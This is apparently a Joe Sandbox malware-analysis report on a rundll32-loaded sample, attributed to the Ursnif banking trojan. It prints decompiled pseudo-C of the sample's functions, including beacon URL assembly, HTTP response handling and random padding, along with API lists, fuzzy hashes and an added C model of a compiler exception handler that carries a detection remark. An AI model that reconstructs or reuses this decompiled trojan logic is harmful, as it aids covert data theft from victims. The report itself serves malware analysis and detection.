                                      [Per-line address column for E04DE821C: 0x04de8220 .. 0x04de8309, 0x00000000 where a line has no code]

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction ID: 47758ee462601e36381f70212b7f66e1da15ffc57eb1865f76cd7e1acd27ed98
                                      • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                      • Instruction Fuzzy Hash: BF21C572A006049FDB11FF69C8C09BBBBA5FF45320B498168E955DB246E730F915DBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%
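The loop in E04DE821C above has the layout of MSVC's statically linked `_except_handler3`: the exception flags at record+4 are tested against 0x6 (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND), a scope table at registration+8 is walked in 12-byte entries (the `(_t86 + _t86*2)*4` stride), the current try level sits at registration+0xC, filters are at entry+4 and handlers at entry+8, and bit 0x8 is set on the record when the frame fails the E04DE8441 check. The C below is an added, portable model of that dispatch written for this page; it is not the sample's code. It reads E04DE8441 as a registration-validity check and E04DE8387 as a local unwind (both inferences from the call shape), stands in a NULL-table test for the real validation, and lets the handler return so the outcome can be observed, whereas the real handler never comes back.

```c
/* Added model of the E04DE821C / _except_handler3 dispatch loop. Not the sample's code. */
#include <stddef.h>
#include <stdio.h>

#define EXC_UNWINDING     0x2u  /* EXCEPTION_UNWINDING   } the 0x6 mask tested at record+4 */
#define EXC_EXIT_UNWIND   0x4u  /* EXCEPTION_EXIT_UNWIND } */
#define EXC_STACK_INVALID 0x8u  /* OR'ed into the record when the frame fails validation */

enum { FILTER_CONTINUE_EXECUTION = -1, FILTER_CONTINUE_SEARCH = 0, FILTER_EXECUTE_HANDLER = 1 };
enum { DISP_CONTINUE_EXECUTION = 0, DISP_CONTINUE_SEARCH = 1, DISP_HANDLER_RAN = 2 /* model only */ };

typedef int  (*filter_fn)(void);
typedef void (*handler_fn)(void);

typedef struct {                 /* 12-byte scope table entry */
    int        prev_try_level;   /* +0: enclosing level, -1 = outermost */
    filter_fn  filter;           /* +4: NULL marks a __finally block */
    handler_fn handler;          /* +8: __except body, or the __finally body */
} scope_entry;

typedef struct { unsigned flags; } exception_record;       /* ExceptionFlags (record+4) */
typedef struct { scope_entry *scope_table; int try_level; } eh3_frame; /* reg+8, reg+0xC */

/* Local unwind (E04DE8387 shape): pop levels down to stop_level, running __finally bodies. */
static void local_unwind(eh3_frame *f, int stop_level)
{
    while (f->try_level != stop_level && f->try_level != -1) {
        scope_entry *e = &f->scope_table[f->try_level];
        f->try_level = e->prev_try_level;
        if (e->filter == NULL && e->handler != NULL) e->handler();
    }
}

int eh3_dispatch(exception_record *rec, eh3_frame *f)
{
    if (rec->flags & (EXC_UNWINDING | EXC_EXIT_UNWIND)) {   /* second pass */
        local_unwind(f, -1);
        return DISP_CONTINUE_SEARCH;
    }
    if (f->scope_table == NULL) {                            /* stands in for E04DE8441 */
        rec->flags |= EXC_STACK_INVALID;
        return DISP_CONTINUE_SEARCH;
    }
    for (int level = f->try_level; level != -1; level = f->scope_table[level].prev_try_level) {
        scope_entry *e = &f->scope_table[level];
        if (e->filter == NULL) continue;                     /* __finally: nothing to ask */
        int verdict = e->filter();
        if (verdict == 0) continue;                          /* search the enclosing level */
        if (verdict < 0) return DISP_CONTINUE_EXECUTION;     /* resume at the fault */
        local_unwind(f, level);                              /* run inner __finally blocks */
        f->try_level = e->prev_try_level;                    /* *(reg+0xC) = prev level */
        e->handler();                                        /* real code jumps, never returns */
        return DISP_HANDLER_RAN;
    }
    return DISP_CONTINUE_SEARCH;
}

/* Constructed scenarios covering each path. Globals expose what happened. */
int g_ran; int g_final_try_level; unsigned g_final_flags;
static int  filter_search(void) { return FILTER_CONTINUE_SEARCH; }
static int  filter_exec(void)   { return FILTER_EXECUTE_HANDLER; }
static int  filter_resume(void) { return FILTER_CONTINUE_EXECUTION; }
static void handler_a(void) { g_ran |= 1; }
static void handler_b(void) { g_ran |= 2; }
static void finally_c(void) { g_ran |= 4; }

int run_scenario(int which)
{
    static scope_entry nested_accept[]  = { { -1, filter_search, handler_a }, { 0, filter_exec, handler_b } };
    static scope_entry finally_inside[] = { { -1, filter_exec, handler_a },   { 0, NULL, finally_c } };
    static scope_entry resume[]         = { { -1, filter_resume, handler_a } };
    static scope_entry nobody[]         = { { -1, filter_search, handler_a } };
    static scope_entry two_finally[]    = { { -1, NULL, finally_c },          { 0, NULL, handler_b } };
    eh3_frame f; exception_record rec = { 0 };
    switch (which) {
    case 1:  f = (eh3_frame){ nested_accept, 1 };  break;   /* inner filter accepts */
    case 2:  f = (eh3_frame){ finally_inside, 1 }; break;   /* __finally nested in accepting level */
    case 3:  f = (eh3_frame){ resume, 0 };         break;   /* filter asks to resume */
    case 4:  f = (eh3_frame){ nobody, 0 };         break;   /* nobody accepts */
    case 5:  f = (eh3_frame){ two_finally, 1 }; rec.flags = EXC_UNWINDING; break; /* unwind pass */
    default: f = (eh3_frame){ NULL, 0 };           break;   /* invalid registration */
    }
    g_ran = 0;
    int d = eh3_dispatch(&rec, &f);
    g_final_try_level = f.try_level;
    g_final_flags = rec.flags;
    return d;
}

int main(void)
{
    for (int i = 1; i <= 6; i++) {
        int d = run_scenario(i);
        printf("scenario %d: disposition %d ran 0x%x try_level %d flags 0x%x\n",
               i, d, g_ran, g_final_try_level, g_final_flags);
    }
    return 0;
}
```

One practical consequence for detection work: this routine, and the helpers it calls, are CRT code linked into any MSVC binary that uses __try/__except, so a YARA rule or fuzzy hash anchored on it identifies the compiler runtime, not the Ursnif family; the family-specific logic lives in the functions that call it.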

                                      C-Code - Quality: 75%
                                      			E04DE59E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                                      				signed int _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* __ebx;
                                      				void* __edi;
                                      				long _t63;
                                      				intOrPtr _t64;
                                      				intOrPtr _t65;
                                      				intOrPtr _t66;
                                      				intOrPtr _t67;
                                      				intOrPtr _t68;
                                      				void* _t71;
                                      				intOrPtr _t72;
                                      				int _t75;
                                      				void* _t76;
                                      				void* _t77;
                                      				void* _t79;
                                      				void* _t82;
                                      				intOrPtr _t86;
                                      				intOrPtr _t90;
                                      				intOrPtr* _t92;
                                      				void* _t98;
                                      				intOrPtr _t104;
                                      				signed int _t108;
                                      				char** _t110;
                                      				int _t113;
                                      				intOrPtr* _t116;
                                      				intOrPtr* _t118;
                                      				intOrPtr* _t120;
                                      				intOrPtr* _t122;
                                      				intOrPtr _t125;
                                      				intOrPtr _t130;
                                      				int _t134;
                                      				intOrPtr _t136;
                                      				int _t139;
                                      				CHAR* _t140;
                                      				intOrPtr _t141;
                                      				void* _t142;
                                      				void* _t151;
                                      				int _t152;
                                      				void* _t153;
                                      				intOrPtr _t154;
                                      				void* _t156;
                                      				long _t160;
                                      				intOrPtr* _t161;
                                      				intOrPtr* _t162;
                                      				intOrPtr* _t165;
                                      				void* _t166;
                                      				void* _t168;
                                      
                                      				_t151 = __edx;
                                      				_t142 = __ecx;
                                      				_t63 = __eax;
                                      				_v8 = 8;
                                      				if(__eax == 0) {
                                      					_t63 = GetTickCount();
                                      				}
                                      				_t64 =  *0x4dea018; // 0x258be91c
                                      				asm("bswap eax");
                                      				_t65 =  *0x4dea014; // 0x3a87c8cd
                                      				_t140 = _a20;
                                      				asm("bswap eax");
                                      				_t66 =  *0x4dea010; // 0xd8d2f808
                                      				asm("bswap eax");
                                      				_t67 =  *0x4dea00c; // 0x62819102
                                      				asm("bswap eax");
                                      				_t68 =  *0x4dea348; // 0x6bd5a8
                                      				_t3 = _t68 + 0x4deb633; // 0x74666f73
                                      				_t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x4dea02c,  *0x4dea004, _t63);
                                      				_t71 = E04DE3F1E();
                                      				_t72 =  *0x4dea348; // 0x6bd5a8
                                      				_t4 = _t72 + 0x4deb673; // 0x74707526
                                      				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                                      				_t168 = _t166 + 0x38;
                                      				_t153 = _t152 + _t75;
                                      				if(_a8 != 0) {
                                      					_t136 =  *0x4dea348; // 0x6bd5a8
                                      					_t8 = _t136 + 0x4deb67e; // 0x732526
                                      					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                                      					_t168 = _t168 + 0xc;
                                      					_t153 = _t153 + _t139;
                                      				}
                                      				_t76 = E04DE1567(_t142);
                                      				_t141 = __imp__;
                                      				_a8 = _t76;
                                      				if(_t76 != 0) {
                                      					_t130 =  *0x4dea348; // 0x6bd5a8
                                      					_t11 = _t130 + 0x4deb8d4; // 0x736e6426
                                      					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                                      					_t168 = _t168 + 0xc;
                                      					_t153 = _t153 + _t134;
                                      					HeapFree( *0x4dea2d8, 0, _a8);
                                      				}
                                      				_t77 = E04DE3268();
                                      				_a8 = _t77;
                                      				if(_t77 != 0) {
                                      					_t125 =  *0x4dea348; // 0x6bd5a8
                                      					_t15 = _t125 + 0x4deb8dc; // 0x6f687726
                                      					wsprintfA(_t153 + _a20, _t15, _t77);
                                      					_t168 = _t168 + 0xc;
                                      					HeapFree( *0x4dea2d8, 0, _a8);
                                      				}
                                      				_t154 =  *0x4dea3cc; // 0x54a95b0
                                      				_t79 = E04DE5D1C(0x4dea00a, _t154 + 4);
                                      				_t160 = 0;
                                      				_v16 = _t79;
                                      				if(_t79 == 0) {
                                      					L28:
                                      					HeapFree( *0x4dea2d8, _t160, _a20);
                                      					return _v8;
                                      				} else {
                                      					_t82 = RtlAllocateHeap( *0x4dea2d8, 0, 0x800);
                                      					_a8 = _t82;
                                      					if(_t82 == 0) {
                                      						L27:
                                      						HeapFree( *0x4dea2d8, _t160, _v16);
                                      						goto L28;
                                      					}
                                      					E04DE3950(GetTickCount());
                                      					_t86 =  *0x4dea3cc; // 0x54a95b0
                                      					__imp__(_t86 + 0x40);
                                      					asm("lock xadd [eax], ecx");
                                      					_t90 =  *0x4dea3cc; // 0x54a95b0
                                      					__imp__(_t90 + 0x40);
                                      					_t92 =  *0x4dea3cc; // 0x54a95b0
                                      					_t156 = E04DE3739(1, _t151, _a20,  *_t92);
                                      					_v24 = _t156;
                                      					asm("lock xadd [eax], ecx");
                                      					if(_t156 == 0) {
                                      						L26:
                                      						HeapFree( *0x4dea2d8, _t160, _a8);
                                      						goto L27;
                                      					}
                                      					StrTrimA(_t156, 0x4de928c);
                                      					_push(_t156);
                                      					_t98 = E04DE3970();
                                      					_v12 = _t98;
                                      					if(_t98 == 0) {
                                      						L25:
                                      						HeapFree( *0x4dea2d8, _t160, _t156);
                                      						goto L26;
                                      					}
                                      					_t161 = __imp__;
                                      					 *_t161(_t156, _a4);
                                      					 *_t161(_a8, _v16);
                                      					_t162 = __imp__;
                                      					 *_t162(_a8, _v12);
                                      					_t104 = E04DE4208( *_t162(_a8, _t156), _a8);
                                      					_a4 = _t104;
                                      					if(_t104 == 0) {
                                      						_v8 = 8;
                                      						L23:
                                      						E04DE3F62();
                                      						L24:
                                      						HeapFree( *0x4dea2d8, 0, _v12);
                                      						_t160 = 0;
                                      						goto L25;
                                      					}
                                      					_t108 = E04DE388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
                                      					_v8 = _t108;
                                      					if(_t108 == 0) {
                                      						_t165 = _v20;
                                      						_v8 = E04DE3394(_t165, _a4, _a12, _a16);
                                      						_t116 =  *((intOrPtr*)(_t165 + 8));
                                      						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                      						_t118 =  *((intOrPtr*)(_t165 + 8));
                                      						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                      						_t120 =  *((intOrPtr*)(_t165 + 4));
                                      						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                      						_t122 =  *_t165;
                                      						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                      						E04DE4C73(_t165);
                                      					}
                                      					if(_v8 != 0x10d2) {
                                      						L18:
                                      						if(_v8 == 0) {
                                      							_t110 = _a12;
                                      							if(_t110 != 0) {
                                      								_t157 =  *_t110;
                                      								_t163 =  *_a16;
                                      								wcstombs( *_t110,  *_t110,  *_a16);
                                      								_t113 = E04DE43A5(_t157, _t157, _t163 >> 1);
                                      								_t156 = _v24;
                                      								 *_a16 = _t113;
                                      							}
                                      						}
                                      						goto L21;
                                      					} else {
                                      						if(_a12 != 0) {
                                      							L21:
                                      							E04DE4C73(_a4);
                                      							if(_v8 == 0 || _v8 == 0x10d2) {
                                      								goto L24;
                                      							} else {
                                      								goto L23;
                                      							}
                                      						}
                                      						_v8 = _v8 & 0x00000000;
                                      						goto L18;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE59F6
                                      • wsprintfA.USER32 ref: 04DE5A46
                                      • wsprintfA.USER32 ref: 04DE5A63
                                      • wsprintfA.USER32 ref: 04DE5A83
                                      • wsprintfA.USER32 ref: 04DE5AAF
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AC1
                                      • wsprintfA.USER32 ref: 04DE5AE2
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5AF2
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE5B20
                                      • GetTickCount.KERNEL32 ref: 04DE5B31
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE5B45
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE5B63
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE3739: strcpy.NTDLL ref: 04DE3783
                                        • Part of subcall function 04DE3739: lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                      • StrTrimA.SHLWAPI(00000000,04DE928C,?,054A95B0), ref: 04DE5B9A
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE3970: lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                        • Part of subcall function 04DE3970: lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      • lstrcpy.KERNEL32(00000000,?), ref: 04DE5BBB
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5BC3
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE5BD1
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 04DE5BD7
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                      • wcstombs.NTDLL ref: 04DE5C68
                                        • Part of subcall function 04DE3394: SysAllocString.OLEAUT32(?), ref: 04DE33CF
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 04DE5CA9
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04DE5CB5
                                      • HeapFree.KERNEL32(00000000,00000000,?,054A95B0), ref: 04DE5CC1
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE5CCD
                                      • HeapFree.KERNEL32(00000000,?), ref: 04DE5CD9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                      • String ID: FNwPq
                                      • API String ID: 2543559236-3591455833
                                      • Opcode ID: 2c1f28909146b95a94ffad4ef171234d8c6a73e9e1342a01f340ba778be0be9e
                                      • Instruction ID: 6af641025114863f826a1c7ac5bbc60ffa2dc6009f62893c23c356e9a34f9405
                                      • Opcode Fuzzy Hash: 2c1f28909146b95a94ffad4ef171234d8c6a73e9e1342a01f340ba778be0be9e
                                      • Instruction Fuzzy Hash: D0914971601219AFDB11FFA6DC68AAA3BA8FB48354F148055F8089B320D735ED51DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 55%
                                      			E04DE26E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				WCHAR* _v24;
                                      				signed int _v28;
                                      				intOrPtr _v32;
                                      				void* __edi;
                                      				void* __esi;
                                      				WCHAR* _t58;
                                      				signed int _t60;
                                      				signed int _t62;
                                      				intOrPtr _t64;
                                      				intOrPtr _t66;
                                      				intOrPtr _t70;
                                      				void* _t72;
                                      				void* _t75;
                                      				void* _t76;
                                      				WCHAR* _t80;
                                      				WCHAR* _t83;
                                      				void* _t84;
                                      				void* _t85;
                                      				void* _t86;
                                      				intOrPtr _t92;
                                      				signed int _t103;
                                      				void* _t104;
                                      				intOrPtr _t105;
                                      				void* _t107;
                                      				intOrPtr* _t115;
                                      				void* _t119;
                                      				WCHAR* _t125;
                                      
                                      				_t58 =  *0x4dea3dc; // 0x54a9c48
                                      				_v24 = _t58;
                                      				_v28 = 8;
                                      				_v20 = GetTickCount();
                                      				_t60 = E04DE59CA();
                                      				_t103 = 5;
                                      				_t98 = _t60 % _t103 + 6;
                                      				_t62 = E04DE59CA();
                                      				_t117 = _t62 % _t103 + 6;
                                      				_v32 = _t62 % _t103 + 6;
                                      				_t64 = E04DE4B8D(_t60 % _t103 + 6);
                                      				_v16 = _t64;
                                      				if(_t64 != 0) {
                                      					_t66 = E04DE4B8D(_t117);
                                      					_v12 = _t66;
                                      					if(_t66 != 0) {
                                      						_push(5);
                                      						_t104 = 0xa;
                                      						_t119 = E04DE4480(_t104,  &_v20);
                                      						if(_t119 == 0) {
                                      							_t119 = 0x4de918c;
                                      						}
                                      						_t70 = E04DE22D6(_v24);
                                      						_v8 = _t70;
                                      						if(_t70 != 0) {
                                      							_t115 = __imp__;
                                      							_t72 =  *_t115(_t119);
                                      							_t75 =  *_t115(_v8);
                                      							_t76 =  *_t115(_a4);
                                      							_t80 = E04DE4DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                      							_v24 = _t80;
                                      							if(_t80 != 0) {
                                      								_t105 =  *0x4dea348; // 0x6bd5a8
                                      								_t28 = _t105 + 0x4debb08; // 0x530025
                                      								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                      								_push(4);
                                      								_t107 = 5;
                                      								_t83 = E04DE4480(_t107,  &_v20);
                                      								_a8 = _t83;
                                      								if(_t83 == 0) {
                                      									_a8 = 0x4de9190;
                                      								}
                                      								_t84 =  *_t115(_a8);
                                      								_t85 =  *_t115(_v8);
                                      								_t86 =  *_t115(_a4);
                                      								_t125 = E04DE4DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                      								if(_t125 == 0) {
                                      									E04DE4C73(_v24);
                                      								} else {
                                      									_t92 =  *0x4dea348; // 0x6bd5a8
                                      									_t44 = _t92 + 0x4debc80; // 0x73006d
                                      									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                      									 *_a16 = _v24;
                                      									_v28 = _v28 & 0x00000000;
                                      									 *_a20 = _t125;
                                      								}
                                      							}
                                      							E04DE4C73(_v8);
                                      						}
                                      						E04DE4C73(_v12);
                                      					}
                                      					E04DE4C73(_v16);
                                      				}
                                      				return _v28;
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE26FF
                                      • lstrlen.KERNEL32(00000000,00000005), ref: 04DE2780
                                      • lstrlen.KERNEL32(?), ref: 04DE2791
                                      • lstrlen.KERNEL32(00000000), ref: 04DE2798
                                      • lstrlenW.KERNEL32(80000002), ref: 04DE279F
                                      • wsprintfW.USER32 ref: 04DE27E5
                                      • lstrlen.KERNEL32(?,00000004), ref: 04DE2808
                                      • lstrlen.KERNEL32(?), ref: 04DE2811
                                      • lstrlen.KERNEL32(?), ref: 04DE2818
                                      • lstrlenW.KERNEL32(?), ref: 04DE281F
                                      • wsprintfW.USER32 ref: 04DE2856
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                      • String ID:
                                      • API String ID: 822878831-0
                                      • Opcode ID: 23e761b9946afb14c8bfb76a870564656173d5ecbad3bca0a57403efbe59f839
                                      • Instruction ID: 9b3505458e03ee13cc4ccfb1212c9d9162e6e1ce94451adbe54829cc7e0d00d2
                                      • Opcode Fuzzy Hash: 23e761b9946afb14c8bfb76a870564656173d5ecbad3bca0a57403efbe59f839
                                      • Instruction Fuzzy Hash: AA516572E00219ABDF11BFA6DC449EE7BB5FF44354F058065F904AB210DB35EA11DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE5F21(void* __ecx, void* __esi) {
                                      				long _v8;
                                      				long _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _t34;
                                      				long _t39;
                                      				long _t42;
                                      				long _t56;
                                      				void* _t58;
                                      				void* _t59;
                                      				void* _t61;
                                      
                                      				_t61 = __esi;
                                      				_t59 = __ecx;
                                      				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                      				do {
                                      					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                      					_v20 = _t34;
                                      					if(_t34 != 0) {
                                      						L3:
                                      						_v8 = 4;
                                      						_v16 = 0;
                                      						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                      							_t39 = GetLastError();
                                      							_v12 = _t39;
                                      							if(_v20 == 0 || _t39 != 0x2ef3) {
                                      								L15:
                                      								return _v12;
                                      							} else {
                                      								goto L11;
                                      							}
                                      						}
                                      						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                      							goto L11;
                                      						} else {
                                      							_v16 = 0;
                                      							_v8 = 0;
                                      							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                      							_t58 = E04DE4DF6(_v8 + 1);
                                      							if(_t58 == 0) {
                                      								_v12 = 8;
                                      							} else {
                                      								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                      									E04DE4C73(_t58);
                                      									_v12 = GetLastError();
                                      								} else {
                                      									 *((char*)(_t58 + _v8)) = 0;
                                      									 *(_t61 + 0xc) = _t58;
                                      								}
                                      							}
                                      							goto L15;
                                      						}
                                      					}
                                      					SetEvent( *(_t61 + 0x1c));
                                      					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                      					_v12 = _t56;
                                      					if(_t56 != 0) {
                                      						goto L15;
                                      					}
                                      					goto L3;
                                      					L11:
                                      					_t42 = E04DE3A6F( *(_t61 + 0x1c), _t59, 0xea60);
                                      					_v12 = _t42;
                                      				} while (_t42 == 0);
                                      				goto L15;
                                      			}

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,770481D0), ref: 04DE5F38
                                      • SetEvent.KERNEL32(?), ref: 04DE5F48
                                      • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04DE5F7A
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04DE5F9F
                                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04DE5FBF
                                      • GetLastError.KERNEL32 ref: 04DE5FD1
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • GetLastError.KERNEL32(00000000), ref: 04DE6006
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                      • String ID:
                                      • API String ID: 3369646462-0
                                      • Opcode ID: fa339b50003b9beac979b75ac136fc4a397d3a1af0599e1ec2fc21a759380c81
                                      • Instruction ID: ba06d8c87e230409f9d469781ca32cd5e539b4047911c00a6e3c6361e304e065
                                      • Opcode Fuzzy Hash: fa339b50003b9beac979b75ac136fc4a397d3a1af0599e1ec2fc21a759380c81
                                      • Instruction Fuzzy Hash: 223144B5A00309EFDB20EFA6D8949AEB7B8FB04354F5049AAD542A2240D731EB449F60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E04DE72E7(unsigned int __eax, void* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				signed int _t21;
                                      				signed short _t23;
                                      				char* _t27;
                                      				void* _t29;
                                      				void* _t30;
                                      				unsigned int _t33;
                                      				void* _t37;
                                      				unsigned int _t38;
                                      				void* _t41;
                                      				void* _t42;
                                      				int _t45;
                                      				void* _t46;
                                      
                                      				_t42 = __eax;
                                      				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                      				_t38 = __eax;
                                      				_t30 = RtlAllocateHeap( *0x4dea2d8, 0, (__eax >> 3) + __eax + 1);
                                      				_v12 = _t30;
                                      				if(_t30 != 0) {
                                      					_v8 = _t42;
                                      					do {
                                      						_t33 = 0x18;
                                      						if(_t38 <= _t33) {
                                      							_t33 = _t38;
                                      						}
                                      						_t21 =  *0x4dea2f0; // 0x2d16b28d
                                      						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                      						 *0x4dea2f0 = _t23;
                                      						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                      						memcpy(_t30, _v8, _t45);
                                      						_v8 = _v8 + _t45;
                                      						_t27 = _t30 + _t45;
                                      						_t38 = _t38 - _t45;
